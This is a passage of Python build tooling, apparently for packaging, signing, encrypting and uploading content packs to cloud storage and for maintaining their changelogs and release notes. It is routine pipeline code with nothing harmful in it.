Metadata.USE_CASES: self._use_cases,
Metadata.KEY_WORDS: self._keywords,
Metadata.DEPENDENCIES: self._dependencies
}
if self._is_private_pack:
pack_metadata.update({
Metadata.PREMIUM: self._is_premium,
Metadata.VENDOR_ID: self._vendor_id,
Metadata.PARTNER_ID: self._partner_id,
Metadata.PARTNER_NAME: self._partner_name,
Metadata.CONTENT_COMMIT_HASH: self._content_commit_hash,
Metadata.PREVIEW_ONLY: self._preview_only
})
return pack_metadata
def _load_pack_dependencies(self, index_folder_path, pack_names):
""" Loads dependencies metadata and returns mapping of pack id and it's loaded data.
Args:
index_folder_path (str): full path to download index folder.
            pack_names (set): set of all pack names.
Returns:
dict: pack id as key and loaded metadata of packs as value.
bool: True if the pack is missing dependencies, False otherwise.
"""
dependencies_data_result = {}
first_level_dependencies = self.user_metadata.get(Metadata.DEPENDENCIES, {})
all_level_displayed_dependencies = self.user_metadata.get(Metadata.DISPLAYED_IMAGES, [])
dependencies_ids = {d for d in first_level_dependencies.keys()}
dependencies_ids.update(all_level_displayed_dependencies)
if self._pack_name != GCPConfig.BASE_PACK: # check that current pack isn't Base Pack in order to prevent loop
dependencies_ids.add(GCPConfig.BASE_PACK) # Base pack is always added as pack dependency
for dependency_pack_id in dependencies_ids:
dependency_metadata_path = os.path.join(index_folder_path, dependency_pack_id, Pack.METADATA)
if os.path.exists(dependency_metadata_path):
with open(dependency_metadata_path, 'r') as metadata_file:
dependency_metadata = json.load(metadata_file)
dependencies_data_result[dependency_pack_id] = dependency_metadata
elif dependency_pack_id in pack_names:
# If the pack is dependent on a new pack (which is not yet in the index.json)
# we will note that it is missing dependencies.
# And finally after updating all the packages in index.json.
# We will go over the pack again to add what was missing
self._is_missing_dependencies = True
logging.warning(f"{self._pack_name} pack dependency with id {dependency_pack_id} "
f"was not found in index, marking it as missing dependencies - to be resolved in next"
f" iteration over packs")
else:
logging.warning(f"{self._pack_name} pack dependency with id {dependency_pack_id} was not found")
return dependencies_data_result, self._is_missing_dependencies
@staticmethod
def _get_updated_changelog_entry(changelog: dict, version: str, release_notes: str = None,
version_display_name: str = None, build_number_with_prefix: str = None,
released_time: str = None):
"""
Args:
changelog (dict): The changelog from the production bucket.
version (str): The version that is the key in the changelog of the entry wished to be updated.
release_notes (str): The release notes lines to update the entry with.
version_display_name (str): The version display name to update the entry with.
            build_number_with_prefix (str): the build number to modify the entry to, including the prefix R (if present).
released_time: The released time to update the entry with.
"""
changelog_entry = changelog.get(version)
if not changelog_entry:
raise Exception('The given version is not a key in the changelog')
version_display_name = \
version_display_name if version_display_name else changelog_entry[Changelog.DISPLAY_NAME].split('-')[0]
build_number_with_prefix = \
build_number_with_prefix if build_number_with_prefix else \
changelog_entry[Changelog.DISPLAY_NAME].split('-')[1]
changelog_entry[Changelog.RELEASE_NOTES] = release_notes if release_notes else changelog_entry[
Changelog.RELEASE_NOTES]
changelog_entry[Changelog.DISPLAY_NAME] = f'{version_display_name} - {build_number_with_prefix}'
changelog_entry[Changelog.RELEASED] = released_time if released_time else changelog_entry[Changelog.RELEASED]
return changelog_entry
def _create_changelog_entry(self, release_notes, version_display_name, build_number, pack_was_modified=False,
new_version=True, initial_release=False):
""" Creates dictionary entry for changelog.
Args:
release_notes (str): release notes md.
version_display_name (str): display name version.
            build_number (str): current build number.
pack_was_modified (bool): whether the pack was modified.
new_version (bool): whether the entry is new or not. If not new, R letter will be appended to build number.
initial_release (bool): whether the entry is an initial release or not.
Returns:
dict: release notes entry of changelog
"""
if new_version:
return {Changelog.RELEASE_NOTES: release_notes,
Changelog.DISPLAY_NAME: f'{version_display_name} - {build_number}',
Changelog.RELEASED: datetime.utcnow().strftime(Metadata.DATE_FORMAT)}
elif initial_release:
return {Changelog.RELEASE_NOTES: release_notes,
Changelog.DISPLAY_NAME: f'{version_display_name} - {build_number}',
Changelog.RELEASED: self._create_date}
elif pack_was_modified:
return {Changelog.RELEASE_NOTES: release_notes,
Changelog.DISPLAY_NAME: f'{version_display_name} - R{build_number}',
Changelog.RELEASED: datetime.utcnow().strftime(Metadata.DATE_FORMAT)}
return {}
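    # Illustrative example (not part of the original file): for a hypothetical new version "1.0.1"
    # built with build number "123456", the created entry would look roughly like (key names follow
    # the Changelog constants, shown here with their conventional JSON names):
    #     {
    #         "releaseNotes": "...",
    #         "displayName": "1.0.1 - 123456",
    #         "released": "2021-01-01T00:00:00Z"
    #     }
    # For a re-upload of an existing, modified version (new_version=False, pack_was_modified=True),
    # the build number in the display name gets an "R" prefix, e.g. "1.0.1 - R123456".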
def remove_unwanted_files(self, delete_test_playbooks=True):
""" Iterates over pack folder and removes hidden files and unwanted folders.
Args:
delete_test_playbooks (bool): whether to delete test playbooks folder.
Returns:
bool: whether the operation succeeded.
"""
task_status = True
try:
for directory in Pack.EXCLUDE_DIRECTORIES:
if delete_test_playbooks and os.path.isdir(f'{self._pack_path}/{directory}'):
shutil.rmtree(f'{self._pack_path}/{directory}')
logging.info(f"Deleted {directory} directory from {self._pack_name} pack")
for root, dirs, files in os.walk(self._pack_path, topdown=True):
for pack_file in files:
full_file_path = os.path.join(root, pack_file)
# removing unwanted files
if pack_file.startswith('.') \
or pack_file in [Pack.AUTHOR_IMAGE_NAME, Pack.USER_METADATA] \
or pack_file in self._remove_files_list:
os.remove(full_file_path)
logging.info(f"Deleted pack {pack_file} file for {self._pack_name} pack")
continue
except Exception:
task_status = False
logging.exception(f"Failed to delete ignored files for pack {self._pack_name}")
finally:
return task_status
def sign_pack(self, signature_string=None):
""" Signs pack folder and creates signature file.
Args:
signature_string (str): Base64 encoded string used to sign the pack.
Returns:
bool: whether the operation succeeded.
"""
task_status = False
try:
if signature_string:
with open("keyfile", "wb") as keyfile:
keyfile.write(signature_string.encode())
arg = f'./signDirectory {self._pack_path} keyfile base64'
signing_process = subprocess.Popen(arg, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
output, err = signing_process.communicate()
if err:
logging.error(f"Failed to sign pack for {self._pack_name} - {str(err)}")
return
logging.info(f"Signed {self._pack_name} pack successfully")
else:
logging.info(f"No signature provided. Skipped signing {self._pack_name} pack")
task_status = True
except Exception:
logging.exception(f"Failed to sign pack for {self._pack_name}")
finally:
return task_status
@staticmethod
def encrypt_pack(zip_pack_path, pack_name, encryption_key, extract_destination_path,
private_artifacts_dir, secondary_encryption_key):
""" decrypt the pack in order to see that the pack was encrypted in the first place.
Args:
zip_pack_path (str): The path to the encrypted zip pack.
pack_name (str): The name of the pack that should be encrypted.
encryption_key (str): The key which we can decrypt the pack with.
extract_destination_path (str): The path in which the pack resides.
private_artifacts_dir (str): The chosen name for the private artifacts directory.
secondary_encryption_key (str) : A second key which we can decrypt the pack with.
"""
try:
current_working_dir = os.getcwd()
shutil.copy('./encryptor', os.path.join(extract_destination_path, 'encryptor'))
os.chmod(os.path.join(extract_destination_path, 'encryptor'), stat.S_IXOTH)
os.chdir(extract_destination_path)
subprocess.call('chmod +x ./encryptor', shell=True)
output_file = zip_pack_path.replace("_not_encrypted.zip", ".zip")
full_command = f'./encryptor ./{pack_name}_not_encrypted.zip {output_file} "{encryption_key}"'
subprocess.call(full_command, shell=True)
secondary_encryption_key_output_file = zip_pack_path.replace("_not_encrypted.zip", ".enc2.zip")
full_command_with_secondary_encryption = f'./encryptor ./{pack_name}_not_encrypted.zip ' \
f'{secondary_encryption_key_output_file}' \
f' "{secondary_encryption_key}"'
subprocess.call(full_command_with_secondary_encryption, shell=True)
new_artefacts = os.path.join(current_working_dir, private_artifacts_dir)
if os.path.exists(new_artefacts):
shutil.rmtree(new_artefacts)
os.mkdir(path=new_artefacts)
shutil.copy(zip_pack_path, os.path.join(new_artefacts, f'{pack_name}_not_encrypted.zip'))
shutil.copy(output_file, os.path.join(new_artefacts, f'{pack_name}.zip'))
shutil.copy(secondary_encryption_key_output_file, os.path.join(new_artefacts, f'{pack_name}.enc2.zip'))
os.chdir(current_working_dir)
except (subprocess.CalledProcessError, shutil.Error) as error:
print(f"Error while trying to encrypt pack. {error}")
def decrypt_pack(self, encrypted_zip_pack_path, decryption_key):
""" decrypt the pack in order to see that the pack was encrypted in the first place.
Args:
encrypted_zip_pack_path (str): The path for the encrypted zip pack.
decryption_key (str): The key which we can decrypt the pack with.
Returns:
bool: whether the decryption succeeded.
"""
try:
current_working_dir = os.getcwd()
extract_destination_path = f'{current_working_dir}/decrypt_pack_dir'
os.mkdir(extract_destination_path)
shutil.copy('./decryptor', os.path.join(extract_destination_path, 'decryptor'))
secondary_encrypted_pack_path = os.path.join(extract_destination_path, 'encrypted_zip_pack.zip')
shutil.copy(encrypted_zip_pack_path, secondary_encrypted_pack_path)
os.chmod(os.path.join(extract_destination_path, 'decryptor'), stat.S_IXOTH)
output_decrypt_file_path = f"{extract_destination_path}/decrypt_pack.zip"
os.chdir(extract_destination_path)
subprocess.call('chmod +x ./decryptor', shell=True)
full_command = f'./decryptor {secondary_encrypted_pack_path} {output_decrypt_file_path} "{decryption_key}"'
process = subprocess.Popen(full_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout, stderr = process.communicate()
shutil.rmtree(extract_destination_path)
os.chdir(current_working_dir)
if stdout:
logging.info(str(stdout))
if stderr:
logging.error(f"Error: Premium pack {self._pack_name} should be encrypted, but isn't.")
return False
return True
except subprocess.CalledProcessError as error:
logging.exception(f"Error while trying to decrypt pack. {error}")
return False
def is_pack_encrypted(self, encrypted_zip_pack_path, decryption_key):
""" Checks if the pack is encrypted by trying to decrypt it.
Args:
encrypted_zip_pack_path (str): The path for the encrypted zip pack.
decryption_key (str): The key which we can decrypt the pack with.
Returns:
bool: whether the pack is encrypted.
"""
return self.decrypt_pack(encrypted_zip_pack_path, decryption_key)
def zip_pack(self, extract_destination_path="", pack_name="", encryption_key="",
private_artifacts_dir='private_artifacts', secondary_encryption_key=""):
""" Zips pack folder.
Returns:
bool: whether the operation succeeded.
str: full path to created pack zip.
"""
zip_pack_path = f"{self._pack_path}.zip" if not encryption_key else f"{self._pack_path}_not_encrypted.zip"
task_status = False
try:
with ZipFile(zip_pack_path, 'w', ZIP_DEFLATED) as pack_zip:
for root, dirs, files in os.walk(self._pack_path, topdown=True):
for f in files:
full_file_path = os.path.join(root, f)
relative_file_path = os.path.relpath(full_file_path, self._pack_path)
pack_zip.write(filename=full_file_path, arcname=relative_file_path)
if encryption_key:
self.encrypt_pack(zip_pack_path, pack_name, encryption_key, extract_destination_path,
private_artifacts_dir, secondary_encryption_key)
task_status = True
logging.success(f"Finished zipping {self._pack_name} pack.")
except Exception:
logging.exception(f"Failed in zipping {self._pack_name} folder")
finally:
# If the pack needs to be encrypted, it is initially at a different location than this final path
final_path_to_zipped_pack = f"{self._pack_path}.zip"
return task_status, final_path_to_zipped_pack
def detect_modified(self, content_repo, index_folder_path, current_commit_hash, previous_commit_hash):
""" Detects pack modified files.
The diff is done between current commit and previous commit that was saved in metadata that was downloaded from
index. In case that no commit was found in index (initial run), the default value will be set to previous commit
from origin/master.
Args:
content_repo (git.repo.base.Repo): content repo object.
index_folder_path (str): full path to downloaded index folder.
current_commit_hash (str): last commit hash of head.
previous_commit_hash (str): the previous commit to diff with.
Returns:
bool: whether the operation succeeded.
list: list of RN files that were modified.
bool: whether pack was modified and override will be required.
"""
task_status = False
modified_rn_files_paths = []
pack_was_modified = False
try:
pack_index_metadata_path = os.path.join(index_folder_path, self._pack_name, Pack.METADATA)
if not os.path.exists(pack_index_metadata_path):
logging.info(f"{self._pack_name} pack was not found in index, skipping detection of modified pack.")
task_status = True
return
with open(pack_index_metadata_path, 'r') as metadata_file:
downloaded_metadata = json.load(metadata_file)
previous_commit_hash = downloaded_metadata.get(Metadata.COMMIT, previous_commit_hash)
# set 2 commits by hash value in order to check the modified files of the diff
current_commit = content_repo.commit(current_commit_hash)
previous_commit = content_repo.commit(previous_commit_hash)
for modified_file in current_commit.diff(previous_commit):
if modified_file.a_path.startswith(PACKS_FOLDER):
modified_file_path_parts = os.path.normpath(modified_file.a_path).split(os.sep)
if modified_file_path_parts[1] and modified_file_path_parts[1] == self._pack_name:
if not is_ignored_pack_file(modified_file_path_parts):
logging.info(f"Detected modified files in {self._pack_name} pack")
task_status, pack_was_modified = True, True
modified_rn_files_paths.append(modified_file.a_path)
else:
logging.debug(f'{modified_file.a_path} is an ignored file')
task_status = True
if pack_was_modified:
# Make sure the modification is not only of release notes files, if so count that as not modified
pack_was_modified = not all(self.RELEASE_NOTES in path for path in modified_rn_files_paths)
# Filter modifications in release notes config JSON file - they will be handled later on.
modified_rn_files_paths = [path_ for path_ in modified_rn_files_paths if path_.endswith('.md')]
return
except Exception:
logging.exception(f"Failed in detecting modified files of {self._pack_name} pack")
finally:
return task_status, modified_rn_files_paths, pack_was_modified
def upload_to_storage(self, zip_pack_path, latest_version, storage_bucket, override_pack, storage_base_path,
private_content=False, pack_artifacts_path=None):
""" Manages the upload of pack zip artifact to correct path in cloud storage.
The zip pack will be uploaded to following path: /content/packs/pack_name/pack_latest_version.
In case that zip pack artifact already exist at constructed path, the upload will be skipped.
        If the flag override_pack is set to True, the pack will be forced for upload.
Args:
zip_pack_path (str): full path to pack zip artifact.
latest_version (str): pack latest version.
storage_bucket (google.cloud.storage.bucket.Bucket): google cloud storage bucket.
override_pack (bool): whether to override existing pack.
private_content (bool): Is being used in a private content build.
pack_artifacts_path (str): Path to where we are saving pack artifacts.
Returns:
bool: whether the operation succeeded.
            bool: True in case the pack already exists at the targeted path and the upload was skipped, otherwise False.
"""
task_status = True
try:
version_pack_path = os.path.join(storage_base_path, self._pack_name, latest_version)
existing_files = [f.name for f in storage_bucket.list_blobs(prefix=version_pack_path)]
if existing_files and not override_pack:
logging.warning(f"The following packs already exist at storage: {', '.join(existing_files)}")
logging.warning(f"Skipping step of uploading {self._pack_name}.zip to storage.")
return task_status, True, None
pack_full_path = os.path.join(version_pack_path, f"{self._pack_name}.zip")
blob = storage_bucket.blob(pack_full_path)
blob.cache_control = "no-cache,max-age=0" # disabling caching for pack blob
with open(zip_pack_path, "rb") as pack_zip:
blob.upload_from_file(pack_zip)
if private_content:
secondary_encryption_key_pack_name = f"{self._pack_name}.enc2.zip"
secondary_encryption_key_bucket_path = os.path.join(version_pack_path,
secondary_encryption_key_pack_name)
# In some cases the path given is actually a zip.
if pack_artifacts_path.endswith('content_packs.zip'):
_pack_artifacts_path = pack_artifacts_path.replace('/content_packs.zip', '')
else:
_pack_artifacts_path = pack_artifacts_path
secondary_encryption_key_artifacts_path = zip_pack_path.replace(f'{self._pack_name}',
f'{self._pack_name}.enc2')
blob = storage_bucket.blob(secondary_encryption_key_bucket_path)
blob.cache_control = "no-cache,max-age=0" # disabling caching for pack blob
with open(secondary_encryption_key_artifacts_path, "rb") as pack_zip:
blob.upload_from_file(pack_zip)
print(
f"Copying {secondary_encryption_key_artifacts_path} to {_pack_artifacts_path}/"
f"packs/{self._pack_name}.zip")
shutil.copy(secondary_encryption_key_artifacts_path,
f'{_pack_artifacts_path}/packs/{self._pack_name}.zip')
self.public_storage_path = blob.public_url
logging.success(f"Uploaded {self._pack_name} pack to {pack_full_path} path.")
return task_status, False, pack_full_path
except Exception:
task_status = False
logging.exception(f"Failed in uploading {self._pack_name} pack to gcs.")
return task_status, True, None
def copy_and_upload_to_storage(self, production_bucket, build_bucket, successful_packs_dict, storage_base_path,
build_bucket_base_path):
""" Manages the copy of pack zip artifact from the build bucket to the production bucket.
The zip pack will be copied to following path: /content/packs/pack_name/pack_latest_version if
the pack exists in the successful_packs_dict from Prepare content step in Create Instances job.
Args:
production_bucket (google.cloud.storage.bucket.Bucket): google cloud production bucket.
build_bucket (google.cloud.storage.bucket.Bucket): google cloud build bucket.
successful_packs_dict (dict): the dict of all packs were uploaded in prepare content step
storage_base_path (str): The target destination of the upload in the target bucket.
build_bucket_base_path (str): The path of the build bucket in gcp.
Returns:
bool: Status - whether the operation succeeded.
bool: Skipped pack - true in case of pack existence at the targeted path and the copy process was skipped,
otherwise returned False.
"""
pack_not_uploaded_in_prepare_content = self._pack_name not in successful_packs_dict
if pack_not_uploaded_in_prepare_content:
logging.warning("The following packs already exist at storage.")
logging.warning(f"Skipping step of uploading {self._pack_name}.zip to storage.")
return True, True
latest_version = successful_packs_dict[self._pack_name][BucketUploadFlow.LATEST_VERSION]
self._latest_version = latest_version
build_version_pack_path = os.path.join(build_bucket_base_path, self._pack_name, latest_version)
# Verifying that the latest version of the pack has been uploaded to the build bucket
existing_bucket_version_files = [f.name for f in build_bucket.list_blobs(prefix=build_version_pack_path)]
if not existing_bucket_version_files:
logging.error(f"{self._pack_name} latest version ({latest_version}) was not found on build bucket at "
f"path {build_version_pack_path}.")
return False, False
# We upload the pack zip object taken from the build bucket into the production bucket
prod_version_pack_path = os.path.join(storage_base_path, self._pack_name, latest_version)
prod_pack_zip_path = os.path.join(prod_version_pack_path, f'{self._pack_name}.zip')
build_pack_zip_path = os.path.join(build_version_pack_path, f'{self._pack_name}.zip')
build_pack_zip_blob = build_bucket.blob(build_pack_zip_path)
try:
copied_blob = build_bucket.copy_blob(
blob=build_pack_zip_blob, destination_bucket=production_bucket, new_name=prod_pack_zip_path
)
copied_blob.cache_control = "no-cache,max-age=0" # disabling caching for pack blob
self.public_storage_path = copied_blob.public_url
task_status = copied_blob.exists()
except Exception as e:
pack_suffix = os.path.join(self._pack_name, latest_version, f'{self._pack_name}.zip')
logging.exception(f"Failed copying {pack_suffix}. Additional Info: {str(e)}")
return False, False
if not task_status:
logging.error(f"Failed in uploading {self._pack_name} pack to production gcs.")
else:
# Determine if pack versions were aggregated during upload
pack_uploaded_in_prepare_content = not pack_not_uploaded_in_prepare_content
if pack_uploaded_in_prepare_content:
agg_str = successful_packs_dict[self._pack_name].get('aggregated')
if agg_str:
self._aggregated = True
self._aggregation_str = agg_str
logging.success(f"Uploaded {self._pack_name} pack to {prod_pack_zip_path} path.")
return task_status, False
def get_changelog_latest_rn(self, changelog_index_path: str) -> Tuple[dict, LooseVersion, str]:
"""
Returns the changelog file contents and the last version of rn in the changelog file
Args:
changelog_index_path (str): the changelog.json file path in the index
Returns: the changelog file contents, the last version, and contents of rn in the changelog file
"""
logging.info(f"Found Changelog for: {self._pack_name}")
if os.path.exists(changelog_index_path):
try:
with open(changelog_index_path, "r") as changelog_file:
changelog = json.load(changelog_file)
except json.JSONDecodeError:
changelog = {}
else:
changelog = {}
# get the latest rn version in the changelog.json file
changelog_rn_versions = [LooseVersion(ver) for ver in changelog]
# no need to check if changelog_rn_versions isn't empty because changelog file exists
changelog_latest_rn_version = max(changelog_rn_versions)
changelog_latest_rn = changelog[changelog_latest_rn_version.vstring]["releaseNotes"]
return changelog, changelog_latest_rn_version, changelog_latest_rn
def get_modified_release_notes_lines(self, release_notes_dir: str, new_release_notes_versions: list,
changelog: dict, modified_rn_files: list):
"""
In the case where an rn file was changed, this function returns the new content
of the release note in the format suitable for the changelog file.
In general, if two rn files are created between two consecutive upload runs (i.e. pack was changed twice),
the rn files are being aggregated and the latter version is the one that is being used as a key in the changelog
file, and the aggregated rns as the value.
Hence, in the case of changing an rn as such, this function re-aggregates all of the rns under the
corresponding version key, and returns the aggregated data, in the right format, as value under that key.
Args:
release_notes_dir (str): the path to the release notes dir
new_release_notes_versions (list): a list of the new versions of release notes in the pack since the
last upload. This means they were already handled on this upload run (and aggregated if needed).
changelog (dict): the changelog from the production bucket.
modified_rn_files (list): a list of the rn files that were modified according to the last commit in
'filename.md' format.
Returns:
            A dict of the modified versions and their release notes contents, for the versions that were modified
            in the current index file.
"""
modified_versions_dict = {}
for rn_filename in modified_rn_files:
version = underscore_file_name_to_dotted_version(rn_filename)
# Should only apply on modified files that are not the last rn file
if version in new_release_notes_versions:
continue
# The case where the version is a key in the changelog file,
# and the value is not an aggregated release note
if is_the_only_rn_in_block(release_notes_dir, version, changelog):
logging.info("The version is a key in the changelog file and by itself in the changelog block")
with open(os.path.join(release_notes_dir, rn_filename), 'r') as rn_file:
rn_lines = rn_file.read()
modified_versions_dict[version] = self._clean_release_notes(rn_lines).strip()
# The case where the version is not a key in the changelog file or it is a key of aggregated content
else:
logging.debug(f'The "{version}" version is not a key in the changelog file or it is a key of'
f' aggregated content')
same_block_versions_dict, higher_nearest_version = self.get_same_block_versions(
release_notes_dir, version, changelog)
modified_versions_dict[higher_nearest_version] = aggregate_release_notes_for_marketplace(
same_block_versions_dict)
return modified_versions_dict
def get_same_block_versions(self, release_notes_dir: str, version: str, changelog: dict):
"""
Get a dict of the version as key and rn data as value of all of the versions that are in the same
block in the changelog file as the given version (these are the versions that were aggregates together
during a single upload priorly).
Args:
release_notes_dir (str): the path to the release notes dir
version (str): the wanted version
changelog (dict): the changelog from the production bucket.
Returns:
A dict of version, rn data for all corresponding versions, and the highest version among those keys as str
"""
lowest_version = [LooseVersion(Pack.PACK_INITIAL_VERSION)]
lower_versions: list = []
higher_versions: list = []
same_block_versions_dict: dict = dict()
for item in changelog.keys(): # divide the versions into lists of lower and higher than given version
(lower_versions if LooseVersion(item) < version else higher_versions).append(LooseVersion(item))
higher_nearest_version = min(higher_versions)
lower_versions = lower_versions + lowest_version # if the version is 1.0.0, ensure lower_versions is not empty
lower_nearest_version = max(lower_versions)
for rn_filename in filter_dir_files_by_extension(release_notes_dir, '.md'):
current_version = underscore_file_name_to_dotted_version(rn_filename)
# Catch all versions that are in the same block
if lower_nearest_version < LooseVersion(current_version) <= higher_nearest_version:
with open(os.path.join(release_notes_dir, rn_filename), 'r') as rn_file:
rn_lines = rn_file.read()
same_block_versions_dict[current_version] = self._clean_release_notes(rn_lines).strip()
return same_block_versions_dict, higher_nearest_version.vstring
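    # Illustrative example (not part of the original file): suppose the changelog keys are "1.0.0"
    # and "1.0.3", where the "1.0.3" entry aggregates the 1.0.1-1.0.3 release notes, and the
    # ReleaseNotes directory contains 1_0_1.md, 1_0_2.md and 1_0_3.md. Then
    #     get_same_block_versions(release_notes_dir, "1.0.2", changelog)
    # returns ({"1.0.1": "...", "1.0.2": "...", "1.0.3": "..."}, "1.0.3") - i.e. every version in
    # the same aggregated block plus the highest version of that block.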
def get_release_notes_lines(self, release_notes_dir: str, changelog_latest_rn_version: LooseVersion,
changelog_latest_rn: str) -> Tuple[str, str, list]:
"""
Prepares the release notes contents for the new release notes entry
Args:
release_notes_dir (str): the path to the release notes dir
changelog_latest_rn_version (LooseVersion): the last version of release notes in the changelog.json file
changelog_latest_rn (str): the last release notes in the changelog.json file
Returns: The release notes contents, the latest release notes version (in the release notes directory),
        and a list of the new rn versions that are being uploaded for the first time.
"""
found_versions: list = list()
pack_versions_dict: dict = dict()
for filename in sorted(filter_dir_files_by_extension(release_notes_dir, '.md')):
version = underscore_file_name_to_dotted_version(filename)
# Aggregate all rn files that are bigger than what we have in the changelog file
if LooseVersion(version) > changelog_latest_rn_version:
with open(os.path.join(release_notes_dir, filename), 'r') as rn_file:
rn_lines = rn_file.read()
pack_versions_dict[version] = self._clean_release_notes(rn_lines).strip()
found_versions.append(LooseVersion(version))
latest_release_notes_version = max(found_versions)
latest_release_notes_version_str = latest_release_notes_version.vstring
logging.info(f"Latest ReleaseNotes version is: {latest_release_notes_version_str}")
if len(pack_versions_dict) > 1:
# In case that there is more than 1 new release notes file, wrap all release notes together for one
# changelog entry
aggregation_str = f"[{', '.join(lv.vstring for lv in found_versions if lv > changelog_latest_rn_version)}]"\
f" => {latest_release_notes_version_str}"
logging.info(f"Aggregating ReleaseNotes versions: {aggregation_str}")
release_notes_lines = aggregate_release_notes_for_marketplace(pack_versions_dict)
self._aggregated = True
self._aggregation_str = aggregation_str
elif len(pack_versions_dict) == 1:
# In case where there is only one new release notes file
release_notes_lines = pack_versions_dict[latest_release_notes_version_str]
else:
# In case where the pack is up to date, i.e. latest changelog is latest rn file
            # We should take the release notes from the index as they might have been aggregated
logging.info(f'No new RN file was detected for pack {self._pack_name}, taking latest RN from the index')
release_notes_lines = changelog_latest_rn
new_release_notes_versions = list(pack_versions_dict.keys())
return release_notes_lines, latest_release_notes_version_str, new_release_notes_versions
def assert_upload_bucket_version_matches_release_notes_version(self,
changelog: dict,
latest_release_notes: str) -> None:
"""
        Sometimes, when the current branch is not merged from master, there could be another version in the upload
        bucket that does not exist in the current branch.
        This case can cause unpredictable behavior and we want to fail the build.
        This method validates that this is not the case in the current build, and if it is - fails it with an
        assertion error.
Args:
changelog: The changelog from the production bucket.
latest_release_notes: The latest release notes version string in the current branch
"""
changelog_latest_release_notes = max(changelog, key=lambda k: LooseVersion(k)) # pylint: disable=W0108
assert LooseVersion(latest_release_notes) >= LooseVersion(changelog_latest_release_notes), \
f'{self._pack_name}: Version mismatch detected between upload bucket and current branch\n' \
f'Upload bucket version: {changelog_latest_release_notes}\n' \
f'current branch version: {latest_release_notes}\n' \
'Please Merge from master and rebuild'
def get_rn_files_names(self, modified_rn_files_paths):
"""
Args:
modified_rn_files_paths: a list containing all modified files in the current pack, generated
by comparing the old and the new commit hash.
Returns:
The names of the modified release notes files out of the given list only,
as in the names of the files that are under ReleaseNotes directory in the format of 'filename.md'.
"""
modified_rn_files = []
for file_path in modified_rn_files_paths:
modified_file_path_parts = os.path.normpath(file_path).split(os.sep)
if self.RELEASE_NOTES in modified_file_path_parts:
modified_rn_files.append(modified_file_path_parts[-1])
return modified_rn_files
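    # Illustrative example (not part of the original file): given modified paths such as
    #     ["Packs/MyPack/ReleaseNotes/1_0_1.md", "Packs/MyPack/pack_metadata.json"]
    # only the ReleaseNotes entry is kept and returned by its file name, i.e. ["1_0_1.md"].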
def prepare_release_notes(self, index_folder_path, build_number, pack_was_modified=False,
modified_rn_files_paths=None):
"""
Handles the creation and update of the changelog.json files.
Args:
index_folder_path (str): Path to the unzipped index json.
build_number (str): circleCI build number.
            pack_was_modified (bool): whether the pack was modified or not.
            modified_rn_files_paths (list): list of paths of the pack's modified files.
Returns:
bool: whether the operation succeeded.
bool: whether running build has not updated pack release notes.
"""
task_status = False
not_updated_build = False
release_notes_dir = os.path.join(self._pack_path, Pack.RELEASE_NOTES)
modified_rn_files_paths = modified_rn_files_paths if modified_rn_files_paths else []
try:
# load changelog from downloaded index
logging.info(f"Loading changelog for {self._pack_name} pack")
changelog_index_path = os.path.join(index_folder_path, self._pack_name, Pack.CHANGELOG_JSON)
if os.path.exists(changelog_index_path):
changelog, changelog_latest_rn_version, changelog_latest_rn = \
self.get_changelog_latest_rn(changelog_index_path)
if os.path.exists(release_notes_dir):
# Handling latest release notes files
release_notes_lines, latest_release_notes, new_release_notes_versions = \
self.get_release_notes_lines(
release_notes_dir, changelog_latest_rn_version, changelog_latest_rn)
self.assert_upload_bucket_version_matches_release_notes_version(changelog, latest_release_notes)
# Handling modified old release notes files, if there are any
rn_files_names = self.get_rn_files_names(modified_rn_files_paths)
modified_release_notes_lines_dict = self.get_modified_release_notes_lines(
release_notes_dir, new_release_notes_versions, changelog, rn_files_names)
if self._current_version != latest_release_notes:
logging.error(f"Version mismatch detected between current version: {self._current_version} "
f"and latest release notes version: {latest_release_notes}")
task_status = False
return task_status, not_updated_build
else:
if latest_release_notes in changelog:
logging.info(f"Found existing release notes for version: {latest_release_notes}")
version_changelog = self._create_changelog_entry(release_notes=release_notes_lines,
version_display_name=latest_release_notes,
build_number=build_number,
pack_was_modified=pack_was_modified,
new_version=False)
else:
logging.info(f"Created new release notes for version: {latest_release_notes}")
version_changelog = self._create_changelog_entry(release_notes=release_notes_lines,
version_display_name=latest_release_notes,
build_number=build_number,
new_version=True)
if version_changelog:
changelog[latest_release_notes] = version_changelog
if modified_release_notes_lines_dict:
logging.info("updating changelog entries for modified rn")
for version, modified_release_notes_lines in modified_release_notes_lines_dict.items():
updated_entry = self._get_updated_changelog_entry(
changelog, version, release_notes=modified_release_notes_lines)
changelog[version] = updated_entry
                else:  # will enter only on the initial version, when the release notes folder was not yet created
if len(changelog.keys()) > 1 or Pack.PACK_INITIAL_VERSION not in changelog:
logging.warning(
f"{self._pack_name} pack mismatch between {Pack.CHANGELOG_JSON} and {Pack.RELEASE_NOTES}")
task_status, not_updated_build = True, True
return task_status, not_updated_build
changelog[Pack.PACK_INITIAL_VERSION] = self._create_changelog_entry(
release_notes=self.description,
version_display_name=Pack.PACK_INITIAL_VERSION,
build_number=build_number,
initial_release=True,
new_version=False)
logging.info(f"Found existing release notes for version: {Pack.PACK_INITIAL_VERSION} "
f"in the {self._pack_name} pack.")
elif self._current_version == Pack.PACK_INITIAL_VERSION:
version_changelog = self._create_changelog_entry(
release_notes=self.description,
version_display_name=Pack.PACK_INITIAL_VERSION,
build_number=build_number,
new_version=True,
initial_release=True
)
changelog = {
Pack.PACK_INITIAL_VERSION: version_changelog
}
elif self._hidden:
logging.warning(f"Pack {self._pack_name} is deprecated. Skipping release notes handling.")
task_status = True
not_updated_build = True
return task_status, not_updated_build
else:
logging.error(f"No release notes found for: {self._pack_name}")
task_status = False
return task_status, not_updated_build
# Update change log entries with BC flag.
self.add_bc_entries_if_needed(release_notes_dir, changelog)
# write back changelog with changes to pack folder
with open(os.path.join(self._pack_path, Pack.CHANGELOG_JSON), "w") as pack_changelog:
json.dump(changelog, pack_changelog, indent=4)
task_status = True
logging.success(f"Finished creating {Pack.CHANGELOG_JSON} for {self._pack_name}")
except Exception as e:
logging.error(f"Failed creating {Pack.CHANGELOG_JSON} file for {self._pack_name}.\n "
f"Additional info: {e}")
finally:
return task_status, not_updated_build
def create_local_changelog(self, build_index_folder_path):
""" Copies the pack index changelog.json file to the pack path
Args:
build_index_folder_path: The path to the build index folder
Returns:
bool: whether the operation succeeded.
"""
task_status = True
build_changelog_index_path = os.path.join(build_index_folder_path, self._pack_name, Pack.CHANGELOG_JSON)
